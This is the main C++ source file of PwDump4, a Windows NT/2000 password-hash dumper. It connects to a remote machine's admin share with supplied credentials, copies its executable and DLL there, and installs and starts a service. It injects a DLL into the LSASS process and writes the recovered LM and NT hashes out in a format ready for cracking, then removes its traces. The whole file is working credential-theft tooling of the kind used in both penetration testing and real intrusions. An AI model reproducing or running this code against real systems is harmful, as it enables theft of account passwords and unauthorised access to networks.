/***************************************************************************
 * Program: PWDUMP4 - dump winnt/2000 user/password hash remote or local for crack
 * 
 * Copyright (c) 2002, 2003 bingle, all rights reserved
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License
 * as published by the Free Software Foundation; either version 2
 * of the License, or (at your option) any later version.
 * 
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 * 
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
 *
 * Author:  bingle@email.com.cn
 * File:    DumpMain.cpp
 * Purpose: PwDump4 main file prepare all work for HASH dump and output result
 * Date:    2002-1-20
 * 
 ***************************************************************************/


#include <windows.h>
#include <stdio.h>
#include <conio.h>
#include <time.h>
#include <Lm.h>
#include <locale.h>
#include <assert.h>
#include <process.h>
#include "PwDump4.h"
#pragma comment( lib, "Netapi32.lib" )


// create a one-time obfuscation key
unsigned genKey()
{
    BYTE random[4];
    srand( (unsigned)time( NULL ) );
    for( int i = 0; i < 4; i++ )
        random[i] = (BYTE)rand();
    return *(unsigned*)random;
}

//global params
char *userName = NULL,
	*share = NULL,
	*outName = NULL,
	*target = NULL,
	exeName[MAX_PATH],
	newname[MAX_PATH] = {0};
bool bLocal = false,
	bRename = false;

//output file handle & obfuscation key
FILE* outfile = stdout;
unsigned int magic = 0;

void ProcessDumpOut( char *buff, int len);

int Unicode2Ansi( char *strDest, wchar_t *wcsSrc );
int Ansi2Unicode( wchar_t *wcsDest, char *strSrc, int strCount );

// PwDump4 main program
int PwDumpMain( int argc, char* argv[] )
{
    char errMsg[1024];
    SC_HANDLE hscm = NULL;
    SC_HANDLE hsvc = NULL;

    // remote machine var name
	char buffer[MAX_PATH * 2], *ptr;
	char machineName[MAX_PATH];
    char resourceName[MAX_PATH] = {0};
	char exePath[MAX_PATH], *serviceName;
	bool bDelExe = false, bDelDll = false, bDelSvc = false;

	char rExename[MAX_PATH], rDllname[MAX_PATH];
	SHARE_INFO_2 *shareInfor = NULL;

	// parameters for start service & global magic & pipe
	char* varg[2];
	char magicVal[16], pipename[50];
	magic = genKey();
	sprintf( magicVal, "%08x", magic );
	_snprintf( pipename, sizeof(pipename), "netdpw%u", GetCurrentProcessId() );
	varg[0] = pipename;
	varg[1] = magicVal;


    try
    {
        // output file
        if( outName )
        {
            outfile = fopen( outName, "w" );
            if( !outfile )
            {
                sprintf( errMsg, "Couldn't open %s for write. error:%d\n", outName, GetLastError() );
                throw errMsg;
            }
        }


		/* set the filename & service for remote */
		if( !GetModuleFileName( NULL, exePath, sizeof(exePath) ) )
        {
            sprintf( errMsg, "Cannot get program file name? error: %u\n", GetLastError() );
            throw errMsg;
        }
		ExecuteMainName( exePath, exeName );
		
		ptr = strrchr( exePath, '.' );
		if( ptr ) *ptr = 0;
		else ptr = strchr( exePath, '\0' );

		strcat( exePath, ".dll" );
		FILE *fpDll = fopen( exePath, "r" );
		if( !fpDll ) 
        {
            sprintf( errMsg, "Where is my dll? it should be '%s', open for read error: %u\n", exePath, GetLastError() );
            throw errMsg;
        }
		fclose( fpDll );
		*ptr = 0;
	

		//run locally
		if( bLocal )
		{
			LocalDump( pipename );
			throw "";
		}


		//do rename but not provide name, use the exe name by default
		if( !newname[0] ) strcpy( newname, exeName );

		serviceName = bRename ? newname : DEFAULT_SERVICE;


        // user name get pass
        char* password = NULL;
        if( userName )
        {
            // get password
            int i = 0;
            char c = 0;
            fprintf( stderr, "Please enter the password >" );
            while( c != '\r' )
            {
                c = _getch();
				if(c == 8)
				{
					if(i > 0)
					{
						i--;
						printf("%c %c", 8, 8);
					}
					continue;
				}

                buffer[i++] = c;
				if( i >= sizeof(buffer) ) throw "input password to long.";
                _putch( '*' );
            }
            buffer[--i] = 0;
            _putch( '\r' );
            _putch( '\n' );

            password = (char*)buffer;
        }

		
		char *rshare = share ? share : DEFAULT_SHARE;
		while( *target == '\\' ) target++;
		_snprintf( machineName, sizeof machineName, "\\\\%s", target );
		_snprintf( resourceName, sizeof resourceName, "%s\\%s", machineName, rshare );
		//	setlocale( LC_ALL, "" );

        // connect to machine
        NETRESOURCE rec;
        rec.dwType = RESOURCETYPE_DISK;
        rec.lpLocalName = NULL;
        rec.lpRemoteName = resourceName;
        rec.lpProvider = NULL;
        int ret = WNetAddConnection2( &rec, password, userName, 0 );
        if( ret != ERROR_SUCCESS )
        {
            sprintf( errMsg, "Logon to %s failed: code %d\n", resourceName, ret );
            throw errMsg;
        }


		/* get of local path service exe on remote for start service */
		wchar_t *wptr = (wchar_t*)buffer, *wshare;
		Ansi2Unicode( wptr, machineName, strlen(machineName)+1 );
		wshare = wcschr( wptr, '\0' ) + 1;

		if( !Ansi2Unicode( wshare, rshare, strlen(rshare)+1 ) )
		{
            sprintf( errMsg, "Get share %s unicode form failed: error %d\n", resourceName, GetLastError() );
            throw errMsg;
		}
		
		ret = NetShareGetInfo( (char*)wptr, (char*)wshare, 2, (unsigned char **)&shareInfor );
		if( ret )
		{
            sprintf( errMsg, "Get to share %s local path failed: error %d\n", resourceName, ret );
            throw errMsg;
		}


		/* copy the exe&dll files for service to remote share */
		_snprintf( rExename, MAX_PATH, "%s\\%s.exe", resourceName, newname );
		_snprintf( buffer, MAX_PATH, "%s.exe", exePath );
		if( !CopyFile( buffer, rExename, false ) )
		{
            sprintf( errMsg, "Failed to copy %s.exe, error:%u\n", exeName, GetLastError() );
            throw errMsg;
        }
		bDelExe = true;

		_snprintf( rDllname, MAX_PATH, "%s\\%s.dll", resourceName, newname );
		_snprintf( buffer, MAX_PATH, "%s.dll", exePath );
		if( !CopyFile( buffer, rDllname, false ) )
		{
            sprintf( errMsg, "Failed to copy %s.dll, error:%u\n", exeName, GetLastError() );
            throw errMsg;
        }
		bDelDll = true;


		//make path of service exe for remote, format is: path\newname "-Svc:serviceName"
		Unicode2Ansi( buffer, (u_short*)shareInfor->shi2_path);//, sizeof(buffer) );
		fprintf( stderr, "local path of %s is: %s \n", resourceName, buffer ); 
        
		ptr = strchr( buffer, '\0' );
		if( *(ptr - 1) != '\\') *ptr++ = '\\';
		_snprintf( ptr, MAX_PATH, "%s.exe \"%s%s\"", newname, SERVICE_TAG, serviceName );


        // establish the service on remote machine and create the service
        hscm = OpenSCManager( machineName, NULL, SC_MANAGER_CREATE_SERVICE );
        if( !hscm )
        {
            sprintf( errMsg, "Failed to open Service Manager, error:%u\n", GetLastError() );
            throw errMsg;
        }

        hsvc = CreateService( hscm, serviceName, NULL, SERVICE_ALL_ACCESS, 
                                    SERVICE_INTERACTIVE_PROCESS | SERVICE_WIN32_OWN_PROCESS, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE,
                                    buffer, NULL, NULL, NULL, NULL, NULL );
        if( !hsvc )
        {
            hsvc = OpenService( hscm, serviceName, SERVICE_ALL_ACCESS  );
            if( !hsvc )
            {
                sprintf( errMsg, "Failed to create/open dump service, error:%u\n", GetLastError() );
                throw errMsg;
            }

			LPQUERY_SERVICE_CONFIG sconf;
			unsigned long need = 0;
			QueryServiceConfig( hsvc, NULL, 0, &need );
			sconf = (LPQUERY_SERVICE_CONFIG) malloc( need );
			if( !sconf ) throw "Service already exist in target. Quit!";

			if( !QueryServiceConfig(hsvc, sconf, need, &need) ) throw "Service already exist in target. Quit!";
			if( 0 != stricmp( sconf->lpBinaryPathName, buffer ) ) 
			{
                sprintf( errMsg, "Service \'%s\' already exist in target, but the execute file \'%s\' is not me. Quit! \n", 
					serviceName, sconf->lpBinaryPathName );
                throw errMsg;
			}
        }
		bDelSvc = true;


        // run service
        if( !StartService( hsvc, 2, (const char **)varg ) )
        {
			fprintf( stderr, "Start dump Service failed, error: %d\n", GetLastError() );
			throw "";
		}

        // create pipe for hash data & status info
		ConnParams param;
		param.ip = target;
		param.pipe = varg[0];
		param.func = ProcessDumpOut;
		HANDLE hThread = (HANDLE)_beginthreadex( NULL, 0, thConnectPipe, &param, 0, NULL);
		if( hThread == INVALID_HANDLE )
		{
            fprintf( stderr, "couldn't create receive thread, error: %d\n", GetLastError() );
			throw "";
		}
        fprintf( stderr, "connect to %s for result, plz wait...\n", param.ip );

		// when the executable is finished running, it can be deleted - clean up
        for( int i = 0; i < 30; i++ )
        {
            Sleep( 100 );
            if( DeleteFile( rExename ) )
			{
 				bDelExe = false;
				break;
			}
        }
		WaitForSingleObject( hThread, INFINITE );

        throw " All Completed.\n";
    }

    // clean up
    catch( char* msg )
    {
        if( msg && msg[0] ) fprintf( stderr, msg );
    }

	if( outfile ) fclose( outfile );
	if( bDelExe && !DeleteFile(rExename) )
		fprintf( stderr, "couldn't delete %s from remote machine, error: %d\n", rExename, GetLastError() );
	if( bDelDll && !DeleteFile(rDllname) )
		fprintf( stderr, "couldn't delete %s from remote machine, error: %d\n", rDllname, GetLastError() );
	
	if( bDelSvc)
	{
		DeleteService( hsvc );
		CloseServiceHandle( hsvc );
	}
	if( hscm ) CloseServiceHandle( hscm );
	if( !bLocal) WNetCancelConnection2( resourceName, 0, false );
	if( shareInfor ) NetApiBufferFree( shareInfor );
	
    return 0;
}

int LocalDump( char *pipename )
{
    HANDLE hLsassProc;
	// create pipe for status info
	ConnParams param;
	param.ip = ".";
	param.pipe = pipename;
	param.func = ProcessDumpOut;
	HANDLE hThread = (HANDLE)_beginthreadex( NULL, 0, thConnectPipe, &param, 0, NULL);
	if( hThread == INVALID_HANDLE )
	{
		fprintf( stderr, "couldn't create receive thread, error: %d\n", GetLastError() );
		return 0;
	}

	hLsassProc = PrepareInject( pipename, RUN_LOCALLY );
	if( !hLsassProc ) return 0;

    // Inject the dll
    InjectDll( hLsassProc, magic );

	CloseHandle( hLsassProc );
	extern HANDLE hPipe;
	EndBindPipe( hPipe );//we must end the server pipe, so the program can end.
	WaitForSingleObject( hThread, INFINITE );
	return 0;
}

void ProcessDumpOut( char *buff, int len )
{
        // iterate though all values for this key - one per user on remote machine
	buff[ len ] = 0;

    try
    {
		if( 0 == memcmp( buff, SRV_OUTPUT_TAG, 4 ) || 0 == memcmp( buff, LSA_OUTPUT_TAG, 4 ) )
			throw 1;

		char *pHash = strchr( buff, ':' );
		if( !pHash ) throw 1;
		pHash = strchr( pHash+1, ':' );
		if( !pHash ) throw 1;
		*pHash = 0;
		pHash ++;


		char LMdata[40], NTdata[40], *p;
		int i;
        // obfuscation is reversible - this will make it plain text
        obfuscate( (unsigned*)pHash, magic, 8 );
        BYTE* bdata = (BYTE*)pHash;

        // get LM hash
        if( (pHash[4] == 0x35b4d3aa) && (pHash[5] == 0xee0414b5)
			&& (pHash[6] == 0x35b4d3aa) && (pHash[7] == 0xee0414b5) )
            sprintf( LMdata, "***********NO PASSWORD**********" );
		else for( i = 16, p = LMdata; i < 32; i++, p += 2 )
				sprintf( p, "%02X", bdata[i] );

		// get NT hash
        if( (pHash[0] == 0xe0cfd631) && (pHash[1] == 0x31e96ad1)
			&& (pHash[2] == 0xd7593cb7) && (pHash[3] == 0xc089c0e0) )
            sprintf( NTdata, "***********NO PASSWORD**********" );
		else for( i = 0, p = NTdata; i < 16; i++, p += 2 )
			sprintf( p, "%02X", bdata[i] );

		// display data in L0phtCrack-compatible format
        fprintf( outfile, "%s:%s:%s:::\n", buff, LMdata, NTdata );
	}
    catch( int dump )
    {
		if(dump)fprintf( stderr, "%s", buff );
	}
}


/*	fnExist [in] : the full path or of file to copy.
	pathNew [in] : the path name only without filename to copy file to.
	newFileName [out] : the buff to store the full path name of new file, at least MAX_PATH long.
bool CopyFileTo( char *fnExist, char *pathNew, char newFileName[] )
{
	char localPath[MAX_PATH];
	GetFullPathName( fnExist, sizeof(localPath), localPath, &fnExist );
	_snprintf( newFileName, MAX_PATH, "%s\\%s", pathNew, fnExist );
	return CopyFile( localPath, newFileName, false );
}
*/


char *locales[] = {
"chinese",
"cht",
"chs",
"danish",
"czech",
"belgian",
"dutch",
"australian",
"canadian",
"english",
"english-nz",
"uk",
"american",
"finnish",
"french-belgian",
"french-canadian",
"french",
"french-swiss",
"german-austrian",
"german",
"swiss",
"greek",
"hun",
"icelandic",
"italian",
"italian-swiss",
"jpn",
"korean",
"norwegian-bokmal",
"norwegian",
"norwegian-nynorsk",
"polish",
"portuguese-brazilian",
"portuguese",
"rus",
"slovak",
"spanish",
"spanish-mexican",
"spanish-modern",
"swedish",
"turkish",
NULL
};

/*
when some non-ansi char in unicode string(chinese, korea...), the convert function like
wcstombs & WideCharToMultiByte will fail. if only the locale set properly,
the convertion will be well, but the locale of remote is unknown, so i can
just try all locale one-by-one for each failure unicode char.

I cannot test Unicode2Ansi() & Ansi2Unicode() for more, i just have chinese windows.
*/
int Unicode2Ansi( char *strDest, wchar_t *wcsSrc )
{
	char *dest = strDest;
	wchar_t *source = wcsSrc;
	int temp, page = -1, oldpage = -1;

	for( ; *source != 0; dest++, source++ )
	{
		if( *source < 255 )
			*dest = (char)*source;
		else
		{
			page = -1;
			do{
				temp = wctomb( dest, *source );
				if( temp >= 0 )break;
				page++;
				setlocale( LC_ALL, locales[page] );
			}while( locales[page + 1] );
			if( temp < 0 ) break;//a unicode char cannot convert
			dest++;
			if( page != -1 && page != oldpage )	oldpage = page;
		}
	}
	
	*dest++ = 0;
	if( oldpage != -1 ) printf( "Remote Code Page is: %s.\n", locales[oldpage] );

	if( page > -1 && !locales[page] ) return -1;
	return dest - strDest;
}


//set the code page to 0( a invalid one ), it can convert the chs & jpn, why?
int Ansi2Unicode( wchar_t *wcsDest, char *strSrc, int strCount )
{
	return MultiByteToWideChar(0, MB_PRECOMPOSED | MB_ERR_INVALID_CHARS,
		strSrc, -1, wcsDest, strCount * 2 );
/*
int codepages[] = {
37,
437,
500,
708,
709,
710,
720,
737,
775,
850,
852,
855,
857,
860,
861,
862,
863,
864,
865,
866,
869,
874,
875,
932,
936,
949,
950,
1026,
1250,
1251,
1252,
1253,
1254,
1255,
1256,
1257,
1361,
10000,
10001,
10006,
10007,
10029,
10079,
10081,
0
};

int j;
for ( int i = 0; codepages[i]; i++ )
	if( j = MultiByteToWideChar(codepages[i], MB_PRECOMPOSED | MB_ERR_INVALID_CHARS,
		strSrc, -1, wcsDest, strCount * 2 ) )
		printf("%d,%d ", codepages[i], j);
	else if(87 != GetLastError())printf("%d:%u ", codepages[i], GetLastError() );
puts("");
return j;
*/
}
